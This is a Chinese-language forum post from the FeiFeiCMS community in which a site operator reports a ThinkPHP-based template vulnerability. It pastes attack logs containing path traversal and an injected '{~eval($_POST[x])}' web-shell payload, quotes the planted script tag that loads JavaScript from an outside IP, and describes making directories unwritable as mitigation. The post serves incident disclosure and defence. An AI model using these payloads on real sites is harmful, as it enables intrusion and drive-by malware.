漏洞危害等级非常高,只要被盯上了,有的烦哦。
wooyun.org/bugs/wooyun-2010-082291
下面是后台监控到的日志。
[ 2015-03-24T20:08:54+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:09+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\15_03_16.log]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[my_\..\runtime\logs\{~eval($_POST[x])}]
[ 2015-03-24T20:09:20+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]
[ 2015-03-24T20:09:26+08:00 ] ERR: (ThinkException) 模板不存在[./Tpl/1080p/Home/my_new.html]
挂马的就是这个 狗日的。:
document.write('<script type="text/javascript" src="htt##p:/###/121.40.113.68/header.js"></script>');
发不了连接 #号隔开
当前处理办法:tpl 目录完全不可写。木马就写到 runtime 目录了
飞飞cms官方论坛-www.feifeicms.vip |